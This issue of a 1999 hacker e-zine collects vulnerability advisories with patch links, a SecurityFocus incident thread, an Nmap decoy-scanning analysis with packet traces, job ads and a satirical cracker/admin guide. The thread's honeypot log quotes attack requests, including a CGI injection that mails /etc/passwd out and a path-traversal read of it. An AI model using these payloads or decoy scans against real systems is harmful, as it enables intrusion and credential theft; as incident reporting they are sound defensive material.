Xmonisdn is an X applet that shows the status of the ISDN links which
ships with the isndutils package from Debian GNU/Linux 2.1. You can
configure it to run two scripts when the left or right mouse button are
clicked on it. Xmonisdn was installed setuid root so that the scripts
could do things like add and delete the default route. However is that
while the scripts were checked for owner root and not writeable by group
or others the scripts are run via the system() library function, which
spawns a shell to run it. This means that the scripts are open to attack
via IFS and/or PATH manipulation.
Debian has made patches available at the following locations:
http://security.debian.org/dists/stable/updates/binary-alpha/isdnutils_3.0-12slink13_alpha.deb
http://security.debian.org/dists/stable/updates/binary-i386/isdnutils_3.0-12slink13_i386.deb
http://security.debian.org/dists/stable/updates/binary-sparc/isdnutils_3.0-12slink13_sparc.deb



7: Mini SQL w3-msql Vulnerability
Bugtraq ID: 591
Remote: Yes
Date Published: 1999-08-18
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=591
Summary:
Under certian versions of Mini SQL, the w3-msql CGI script allows users to
view directories which are set for private access via .htaccess files.
Version 2.0.11 of the Mini SQL Server contains a fix for this problem.
Details available at:
http://support.Hughes.com.au/cgi-bin/hughes



8: AIX Source Code Browser Buffer Overflow Vulnerability
Bugtraq ID: 590
Remote: Yes
Date Published: 1999-08-18
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=590
Summary:
A buffer overflow vulnerability has been discovered in the Source Code
Browser's Program Database Name Server Daemon (pdnsd) of versions 2 and 3
of IBM's C Set ++ for AIX. This vulnerability allows local and remote
users to gain root access. While IBM no longer supports the affected
versions, there is a workaround available at the above URL.



9: BSDI Symmetric Multiprocessing (SMP) Vulnerability
Bugtraq ID: 589
Remote: No
Date Published: 1999-08-18
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=589
Summary:
A vulnerability exists in BSDi 4.0.1 Symmetric Multiprocessing (SMP).
During high CPU usage it is possible to cause BSDi 4.0.1 (possibly others
but untested) with all current patches to stop responding and 'lock up'
when a call to fstat is made.



10: Redhat Linux tgetent() Buffer Overflow
Bugtraq ID: 588
Remote: No
Date Published: 1999-08-18
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=588
Summary:
A buffer overflow existed in libtermcap's tgetent() function, which could
cause the user to execute arbitrary code if they were able to supply their
own termcap file.
Red Hat has released a series of rpms to solve this issue. Please see
'solution' at the above URL for more information.



11: Linux in.telnetd Denial of Service Vulnerability
Bugtraq ID: 594
Remote: Yes
Date Published: 1999-08-19
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=594
Summary:
When a telnet client connects to in.telnetd, the two attempt to negotiate
a compatible terminal type (via the TERM environment variable). When the
TERM variable in the client is set before connecting, it's possible that,
depending on what TERM was set to, a denial of service can be caused.
Red Hat has released a series of rpms to solve this issue. Please see
'solution' at the above URL for more information.



12:QMS 2060 Printer Passwordless Root Vulnerability
Bugtraq ID: 593
Remote: Yes
Date Published: 1999-08-19
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=593
Summary:
Access to the QMS 2060 printer is controlled by the passwd.ftp file. This
file contains simply a list of usernames and passwords. However, even with
this file in place, root can still logon without a password entered. This
would allow the attacker to alter the passwd.ftp file, as well as the
hosts file which lists tha machines authorized to print to the QMS.



13: Microsoft JET Text I-ISAM Vulnerability
Bugtraq ID: 595
Remote: Yes
Date Published: 08/20/99
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=595
Summary:
Microsoft's JET database engine includes a functionality referred to as
Text I-ISAM. This allows the JET driver to write to a text file, for the
purpose of another application to read later. This was implemented to
allow data sharing between JET applications and other applications that
don't support Dynamic Data Exchange. The vulnerability lies in the fact
that any text file can be written to, including system files. Because of
this, a database query could be created that added destructive commands to
a startup file or script.
Microsoft has released patces for both JET 3.5x and 4.0:
3.5x:
http://www.securityfocus.com/external/http://support.microsoft.com/download/support/mslfiles/Jet35sp3.exe
4.0:
http://www.securityfocus.com/external/http://support.microsoft.com/download/support/mslfiles/Jet40sp1.exe

@HWA



57.0 A typical script kiddie attack scenerio against HTTP server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Picked up from the message board of www.securityfocus.com...


To: Incidents
Subject: kiddie attack via http
Date: Wed Aug 18 1999 05:13:35
Author: acpizer
Message-ID:
<Pine.NEB.3.96.990818121207.5340B-100000@mach.unseen.org>


Once upon a time, I've setup a small bait, for lusers such as this one,
and it finally paid off:

Aug 12 09:44:52 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:52 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:52 snork fun-httpd: cmd buff: GET /asakaeval HTTP/1.0^M ^M
Aug 12 09:44:52 snork fun-httpd: cmd buff: GET /cgi-bin/phf/ HTTP/1.0^M
Aug 12 09:44:53 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:53 snork fun-httpd: cmd buff: GET /cgi-bin/phf/ HTTP/1.0^M
Aug 12 09:44:54 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:54 snork fun-httpd: cmd buff: GET /cgi-bin/php.cgi/
HTTP/1.0^M
Aug 12 09:44:55 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:55 snork fun-httpd: cmd buff: GET /cgi-bin/campas/ HTTP/1.0^M
Aug 12 09:44:56 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:56 snork fun-httpd: cmd buff: GET /cgi-bin/htmlscript/
HTTP/1.0^M
Aug 12 09:44:57 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:57 snork fun-httpd: cmd buff: GET /cgi-bin/aglimpse/
HTTP/1.0^M
Aug 12 09:44:58 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:59 snork fun-httpd: cmd buff: GET /cgi-bin/websendmail/
HTTP/1.0^Aug 12 09:45:00 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:45:00 snork fun-httpd: cmd buff: GET /cgi-bin/websendmail/
HTTP/1.0^M
Aug 12 09:45:01 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:45:01 snork fun-httpd: cmd buff: GET /info2www HTTP/1.0^M
Aug 12 09:45:03 snork fun-httpd: cmd buff: GET /cgi-bin/pfdispaly.cgi/
HTTP/1.0Aug 12 09:45:04 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:45:04 snork fun-httpd: cmd buff: GET /scripts/convert.bas/
HTTP/1.0^M
Aug 12 09:45:19 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:45:19 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:45:19 snork fun-httpd: cmd buff: GET /info2www
'(../../../../../../../bin/mail </etc/passwd|)'^M ^M
Aug 12 09:45:21 snork fun-httpd: cmd buff: GET /asakaeval HTTP/1.0^M ^M
Aug 12 09:46:07 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:46:08 snork fun-httpd: cmd buff: GET /cgi-bin/webdist.cgi/
HTTP/1.0^M
Aug 12 09:46:23 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:46:23 snork fun-httpd: cmd buff: GET
/scripts/convert.bas?../../etc/passwd HTTP/1.0^M ^M
ARIN shows this on the IP:

Southern New England Telephone (NETBLK-SNET-CIDR001)
27 Butler St.
Meriden, CT 06451-4101
US

Netname: SNET-CIDR001
Netblock: 204.60.0.0 - 204.60.255.0

Coordinator:
Devetzis, Taso N (TND-ARIN) devetzis@SNET.NET
+1 203 771 8917 (FAX) +1 203 771 2008



I don't know some of these vulnerabilities, maybe you guys could enlighten
me
on what you recognize.

Cheers.


To: Incidents
Subject: Re: kiddie attack via http
Date: Mon Aug 23 1999 18:39:22
Author: Fu V0Rt
Message-ID:<19990824023922.16516.qmail@securityfocus.com>


For details on many cgi based vunerabilities, i suggest
having a look at http://v0rt.dayrom.com.au under the
advisories section. we list alot of common cgi
vunerabilities aswell as a tool to scan for most of these
(http://v0rt.dayrom.com.au/profiler/profiler.c)

As for the /asakaeval attack, i also have not seen any
information regarding this.

As a final note, also check your access_log for entries sent
as hex, in some httpd servers they do not correct log
requests sent as hex, therefor its not obvious asto what
they are scanning for to the naked eye.

v0rt_


-------------------------------------------------------------------------------
"Probably you've only really grown up, when you can bear not being understood."

Marian Gold /Alphaville





@HWA

58.0 NMAP - Scan Analysis (v2)
~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.whitehats.com/

Hello,

This page is for anyone who cares to see the details behind an NMAP scan with the -D decoy option set. Basically I hope to answer two questions:

Does NMAP spoof every aspect of the scan, including ICMP, ACK, and OS Identification? (yes, beautifully if used properly)
Can you tell which host in a Decoy Storm is the real host? (no, if used properly)

When I created a case study of these topics earlier today I used decoy hosts that were not responsive (nonexistent IP addresses). Fyodor quickly pointed
out that this breaks one of the cardinal rules of decoy scanning. The decoys must be alive. :)

NMAP appears to correctly spoof identical packets for every operation, sending an identical packet for each source address (your local system, and each
of the decoys). My initial testing showed that only the local system sends RST's in response to successfully queried ports in a SYN scan. However, this
behavior is correct. The local system should not send RST's on behalf of the other systems, because that is exactly what they are supposed to do. My
test decoys (23.23.23.23 and 24.24.24.24) are not active hosts, and so would not generate the expected RST packets. Had I used responsive decoy
hosts, the local system source address would be indistinguishable from the others.

FIN, NULL, XMAS, and UDP scans appear to work equally well with the -D decoy option.

Hope someone finds this remotely useful or interesting.

-Max Vision



Decoys, without OS detection



[audit ~]# nmap -sS -D23.23.23.23,ME,24.24.24.24 -p 80 www.example.com

Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)


ICMP Probe
19:44:00.294222 23.23.23.23 > www.example.com: icmp: echo request
19:44:00.304222 audit.example.com > www.example.com: icmp: echo request
19:44:00.304222 24.24.24.24 > www.example.com: icmp: echo request

ACK Probe
19:44:00.314222 23.23.23.23.38159 > www.example.com.http: . ack 0 win 1024
19:44:00.314222 audit.example.com.38159 > www.example.com.http: . ack 0 win 1024
19:44:00.314222 24.24.24.24.38159 > www.example.com.http: . ack 0 win 1024

Hey we got a live one here!@#$
19:44:00.324222 www.example.com.http > audit.example.com.38159: R 0:0(0) win 0 (DF)

SYN scan
19:44:00.394222 23.23.23.23.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024
19:44:00.394222 audit.example.com.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024
19:44:00.404222 24.24.24.24.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024

SYN+ACK response means open port here. We RST appropriately.
Note: If you use valid decoys they will RST as well.
19:44:00.424222 www.example.com.http > audit.example.com.38139: S 3305543706:3305543706(0) ack 1559207493 win 9112 (DF)
19:44:00.424222 audit.example.com.38139 > www.example.com.http: R 1559207493:1559207493(0) win 0

Interesting ports on www.example.com (1.1.1.1):
Port State Protocol Service
80 open tcp http

Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds


Decoys, OS detection




[audit ~]# nmap -sS -D23.23.23.23,ME,24.24.24.24 -O -p 80 www.example.com

Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)


ICMP Probe
19:29:55.854222 23.23.23.23 > www.example.com: icmp: echo request
19:29:55.864222 audit.example.com > www.example.com: icmp: echo request
19:29:55.864222 24.24.24.24 > www.example.com: icmp: echo request

ACK Probe
19:29:55.864222 23.23.23.23.63836 > www.example.com.http: . ack 0 win 1024
19:29:55.874222 audit.example.com.63836 > www.example.com.http: . ack 0 win 1024
19:29:55.874222 24.24.24.24.63836 > www.example.com.http: . ack 0 win 1024

Wooop got your nose!@#$
19:29:55.884222 www.example.com.http > audit.example.com.63836: R 0:0(0) win 0 (DF)

SYN scan
19:29:55.954222 23.23.23.23.63816 > www.example.com.http: S 1315816470:1315816470(0) win 1024
19:29:55.964222 audit.example.com.63816 > www.example.com.http: S 1315816470:1315816470(0) win 1024
19:29:55.964222 24.24.24.24.63816 > www.example.com.http: S 1315816470:1315816470(0) win 1024

SYN+ACK response means open port here. We RST appropriately.
Note: If you use valid decoys they will RST as well.
19:29:55.974222 www.example.com.http > audit.example.com.63816: S 3191891171:3191891171(0) ack 1315816471 win 9112 (DF)
19:29:55.974222 audit.example.com.63816 > www.example.com.http: R 1315816471:1315816471(0) win 0

OS Detection (Solaris shown)
19:29:55.984222 23.23.23.23.63823 > www.example.com.http: S 3812808641:3812808641(0) win 1024
19:29:55.984222 audit.example.com.63823 > www.example.com.http: S 3812808641:3812808641(0) win 1024
19:29:55.984222 24.24.24.24.63823 > www.example.com.http: S 3812808641:3812808641(0) win 1024

19:29:55.984222 23.23.23.23.63824 > www.example.com.http: . win 1024
19:29:55.984222 audit.example.com.63824 > www.example.com.http: . win 1024
19:29:55.984222 24.24.24.24.63824 > www.example.com.http: . win 1024

19:29:55.994222 23.23.23.23.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0
19:29:55.994222 audit.example.com.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0
19:29:55.994222 24.24.24.24.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0

19:29:55.994222 23.23.23.23.63826 > www.example.com.http: . ack 0 win 1024
19:29:55.994222 www.example.com.http > audit.example.com.63823: S 3192034216:3192034216(0) ack 3812808642 win 8855 (DF)
19:29:55.994222 audit.example.com.63823 > www.example.com.http: R 3812808642:3812808642(0) win 0
19:29:56.004222 audit.example.com.63826 > www.example.com.http: . ack 0 win 1024
19:29:56.004222 24.24.24.24.63826 > www.example.com.http: . ack 0 win 1024

19:29:56.004222 23.23.23.23.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024
19:29:56.004222 audit.example.com.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024
19:29:56.004222 24.24.24.24.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024

19:29:56.004222 23.23.23.23.63828 > www.example.com.34599: . ack 0 win 1024
19:29:56.014222 audit.example.com.63828 > www.example.com.34599: . ack 0 win 1024
19:29:56.014222 24.24.24.24.63828 > www.example.com.34599: . ack 0 win 1024

19:29:56.014222 23.23.23.23.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.014222 audit.example.com.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.014222 24.24.24.24.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0

19:29:56.014222 23.23.23.23.63816 > www.example.com.34599: udp 300
19:29:56.014222 www.example.com.http > audit.example.com.63826: R 0:0(0) win 0 (DF)
19:29:56.024222 audit.example.com.63816 > www.example.com.34599: udp 300
19:29:56.024222 24.24.24.24.63816 > www.example.com.34599: udp 300

19:29:56.634222 23.23.23.23.63824 > www.example.com.http: . win 1024
19:29:56.644222 audit.example.com.63824 > www.example.com.http: . win 1024
19:29:56.644222 24.24.24.24.63824 > www.example.com.http: . win 1024

19:29:56.644222 23.23.23.23.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.644222 audit.example.com.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.644222 24.24.24.24.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0

19:29:56.644222 23.23.23.23.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024
19:29:56.644222 audit.example.com.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024
19:29:56.654222 24.24.24.24.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024

19:29:56.654222 23.23.23.23.63828 > www.example.com.34599: . ack 1 win 1024
19:29:56.654222 audit.example.com.63828 > www.example.com.34599: . ack 1 win 1024
19:29:56.654222 24.24.24.24.63828 > www.example.com.34599: . ack 1 win 1024

19:29:56.654222 23.23.23.23.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.654222 audit.example.com.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.654222 24.24.24.24.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0

19:29:56.664222 23.23.23.23.63816 > www.example.com.34599: udp 300
19:29:56.664222 audit.example.com.63816 > www.example.com.34599: udp 300
19:29:56.664222 24.24.24.24.63816 > www.example.com.34599: udp 300

Sequencing (hey with bsd TTCP and the Linux messup, who needs sequencing? :)
19:29:57.184222 23.23.23.23.63817 > www.example.com.http: S 3812808642:3812808642(0) win 1024
19:29:57.204222 audit.example.com.63817 > www.example.com.http: S 3812808642:3812808642(0) win 1024
19:29:57.214222 www.example.com.http > audit.example.com.63817: S 3192528068:3192528068(0) ack 3812808643 win 9112 (DF)
19:29:57.214222 audit.example.com.63817 > www.example.com.http: R 3812808643:3812808643(0) win 0
19:29:57.224222 24.24.24.24.63817 > www.example.com.http: S 3812808642:3812808642(0) win 1024

19:29:57.244222 23.23.23.23.63818 > www.example.com.http: S 3812808643:3812808643(0) win 1024
19:29:57.264222 audit.example.com.63818 > www.example.com.http: S 3812808643:3812808643(0) win 1024
19:29:57.274222 www.example.com.http > audit.example.com.63818: S 3192724219:3192724219(0) ack 3812808644 win 9112 (DF)
19:29:57.274222 audit.example.com.63818 > www.example.com.http: R 3812808644:3812808644(0) win 0
19:29:57.284222 24.24.24.24.63818 > www.example.com.http: S 3812808643:3812808643(0) win 1024

19:29:57.304222 23.23.23.23.63819 > www.example.com.http: S 3812808644:3812808644(0) win 1024
19:29:57.324222 audit.example.com.63819 > www.example.com.http: S 3812808644:3812808644(0) win 1024
19:29:57.334222 www.example.com.http > audit.example.com.63819: S 3192958008:3192958008(0) ack 3812808645 win 9112 (DF)
19:29:57.334222 audit.example.com.63819 > www.example.com.http: R 3812808645:3812808645(0) win 0
19:29:57.344222 24.24.24.24.63819 > www.example.com.http: S 3812808644:3812808644(0) win 1024

19:29:57.364222 23.23.23.23.63820 > www.example.com.http: S 3812808645:3812808645(0) win 1024
19:29:57.384222 audit.example.com.63820 > www.example.com.http: S 3812808645:3812808645(0) win 1024
19:29:57.394222 www.example.com.http > audit.example.com.63820: S 3193157286:3193157286(0) ack 3812808646 win 9112 (DF)
19:29:57.394222 audit.example.com.63820 > www.example.com.http: R 3812808646:3812808646(0) win 0
19:29:57.404222 24.24.24.24.63820 > www.example.com.http: S 3812808645:3812808645(0) win 1024

19:29:57.424222 23.23.23.23.63821 > www.example.com.http: S 3812808646:3812808646(0) win 1024
19:29:57.444222 audit.example.com.63821 > www.example.com.http: S 3812808646:3812808646(0) win 1024
19:29:57.454222 www.example.com.http > audit.example.com.63821: S 3193331920:3193331920(0) ack 3812808647 win 9112 (DF)
19:29:57.454222 audit.example.com.63821 > www.example.com.http: R 3812808647:3812808647(0) win 0
19:29:57.464222 24.24.24.24.63821 > www.example.com.http: S 3812808646:3812808646(0) win 1024

19:29:57.484222 23.23.23.23.63822 > www.example.com.http: S 3812808647:3812808647(0) win 1024
19:29:57.504222 audit.example.com.63822 > www.example.com.http: S 3812808647:3812808647(0) win 1024
19:29:57.514222 www.example.com.http > audit.example.com.63822: S 3193574611:3193574611(0) ack 3812808648 win 9112 (DF)
19:29:57.514222 audit.example.com.63822 > www.example.com.http: R 3812808648:3812808648(0) win 0
19:29:57.524222 24.24.24.24.63822 > www.example.com.http: S 3812808647:3812808647(0) win 1024

Interesting ports on www.example.com (1.1.1.1):
Port State Protocol Service
80 open tcp http

TCP Sequence Prediction: Class=random positive increments
Difficulty=25258 (Worthy challenge)
Remote operating system guess: Solaris 2.6 - 2.7

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds


Thanks for reading, have fun!

@HWA

59.0 Security Focus: Incidents Summary
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IV. INCIDENTS SUMMARY 1999-08-16 to 1999-08-22
------------------------------------------
1. investigating
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&msg=002301bee915$8587b100$2b81fea9@tarleton.edu


2. kiddie attack via http
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&thread=Pine.NEB.3.96.990819111619.20441B-100000@mach.unseen.org


3. Asaka (was Re: kiddie attack via http)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&thread=37BC586C.42EF65E0@globalstar.com


4. Re: investigating
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&msg=Pine.GSO.4.05.9908211843310.2417-100000@toutatis.comune.modena.it


60.0 Security Focus: Jobs
~~~~~~~~~~~~~~~~~~~~

V. SECURITY JOBS 1999-08-16 to 1999-08-22
-------------------------------------
Seeking Position:


1:Contact: jam smith <suidroot@email.com>
Qualifications:http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&thread=385620377.935021596329.JavaMail.root@web09.mail.com
Date Posted: 1999-08-18


Seeking Staff:


2. Position: mid-level Network Security Engineer
Reply to: Chris Riley <riley@info-tools.com>
Position Requirements:


http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=37B825AD.8064E6F8@info-tools.com
Date Posted: 1999-08-16


3. Position: senior networking staff
Reply to: Vince Reed <vreed@mitre.org>
Position Requirements:


http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=v04210105b3e090fa310b@[128.29.230.9]
Date Posted: 1999-08-17


4. Position: Security Engineer
Reply to: Hal Lockhart <hal.lockhart@storagenetworks.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=9D8B3C643D2AD311BC8D00508B120BA40F5ACC@mahqexc01.storagenetworks.com
Date Posted: 1999-08-18


5. Position: Security Engineer
Reply to: Ben Keepper <bkeepper@home.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=000f01bee9f8$1903e740$d9990018@cv1.sdca.home.com
Date Posted: 1999-08-18


6. Position: Security Consultant
Reply to: Bryan Bushman <bryan.bushman@capitalone.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=0013A20F.4077@capitalone.com
Date Posted: 1999-08-18


7. Position: Network Security Administrator
Reply to: Wooldridge, Doug <doug.wooldridge@echostar.com>
Position Requirements:


http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=35AB03C74901D2119DAA00A0C9B6A1FB9576DD@exchange5.echostar.com
Date Posted: 1999-08-19


8. Position: Project Leader, Team Leader, and Security Engineers
Reply to: Eric Maiwald <maiwalde@fortrex.com>
Position Requirements:


http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=Pine.GSO.3.96.990820141043.8181A-100000@ss5.fred.net
Date Posted: 1999-08-20


@HWA



-=----------=- -=----------=- -=----------=- -=----------=-




O
0
o
O O O
0

-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-

END of main news articles content... read on for ads, humour, hacked websites etc

-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-




HWA.hax0r.news





AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************


www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

<a href="www.2600.com</a">http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>


+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="One">http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *



* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *




* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////


@HWA




HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*

Send in submissions for this section please! ............


An oldie but goodie, noone's sending in submissions,
c'mon you know you wanna...- Ed


A Guide to Internet Security: Becoming an Uebercracker
and Becoming an UeberAdmin to stop Uebercrackers.


Author: Christopher Klaus <cklaus@shadow.net>
Date: December 5th, 1993.
Version: 1.1

This is a paper will be broken into two parts, one showing 15 easy steps
to becoming a uebercracker and the next part showing how to become a
ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased
by Dan Farmer to refer to some elite (cr/h)acker that is practically
impossible to keep out of the networks.

Here's the steps to becoming a uebercracker.

Step 1. Relax and remain calm. Remember YOU are a Uebercracker.

Step 2. If you know a little Unix, you are way ahead of the crowd and skip
past step 3.

Step 3. You may want to buy Unix manual or book to let you know what
ls,cd,cat does.

Step 4. Read Usenet for the following groups: alt.irc, alt.security,
comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background
in uebercracker culture.

Step 5. Ask on alt.irc how to get and compile the latest IRC client and

  
connect to IRC.

Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way
there!)

Step 7. Now, sit on #hack and send messages to everyone in the channel
saying "Hi, Whats up?". Be obnoxious to anyone else that joins and asks
questions like "Why cant I join #warez?"

Step 8. (Important Step) Send private messages to everyone asking for new
bugs or holes. Here's a good pointer, look around your system for binary
programs suid root (look in Unix manual from step 3 if confused). After
finding a suid root binary, (ie. su, chfn, syslog), tell people you have a
new bug in that program and you wrote a script for it. If they ask how it
works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask
them to trade for their get-root scripts.

Step 9. Make them send you some scripts before you send some garbage file
(ie. a big core file). Tell them it is encrypted or it was messed up and
you need to upload your script again.

Step 10. Spend a week grabbing all the scripts you can. (Dont forget to be
obnoxious on #hack otherwise people will look down on you and not give you
anything.)

Step 11. Hopefully you will now have atleast one or two scripts that get
you root on most Unixes. Grab root on your local machines, read your
admin's mail, or even other user's mail, even rm log files and whatever
temps you. (look in Unix manual from step 3 if confused).

Step 12. A good test for true uebercrackerness is to be able to fake mail.
Ask other uebercrackers how to fake mail (because they have had to pass the
same test). Email your admin how "layme" he is and how you got root and how
you erased his files, and have it appear coming from satan@evil.com.

Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag
about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are
a uebercracker.)

Step 14. Wait a few months and have all your notes, etc ready in your room
for when the FBI, Secret Service, and other law enforcement agencies
confinscate your equipment. Call eff.org to complain how you were innocent
and how you accidently gotten someone else's account and only looked
because you were curious. (Whatever else that may help, throw at them.)

Step 15. Now for the true final supreme eliteness of all uebercrackers, you
go back to #hack and brag about how you were busted. YOU are finally a
true Uebercracker.


Now the next part of the paper is top secret. Please only pass to trusted
administrators and friends and even some trusted mailing lists, Usenet
groups, etc. (Make sure no one who is NOT in the inner circle of security
gets this.)

This is broken down on How to Become an UeberAdmin (otherwise know as a
security expert) and How to stop Uebercrackers.

Step 1. Read Unix manual ( a good idea for admins ).

Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install
sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers
now. Rdist scripts is among the favorites for getting root by
uebercrackers.

Step 3. Okay, maybe you want to actually secure your machine from the
elite Uebercrackers who can break into any site on Internet.

Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing
packets. (This only applies to advanced admins who have control of the
router, but this will stop 90% of all uebercrackers from attempting your
site.)

Step 5. Apply all CERT and vendor patches to all of your machines. You have
just now killed 95% of all uebercrackers.

Step 6. Run a good password cracker to find open accounts and close them.
Run tripwire after making sure your binaries are untouched. Run tcp_wrapper
to find if a uebercracker is knocking on your machines. Run ISS to make
sure that all your machines are reasonably secure as far as remote
configuration (ie. your NFS exports and anon FTP site.)

Step 7. If you have done all of the following, you will have stopped 99%
of all uebercrackers. Congrads! (Remember, You are the admin.)

Step 8. Now there is one percent of uebercrackers that have gained
knowledge from reading some security expert's mail (probably gained access
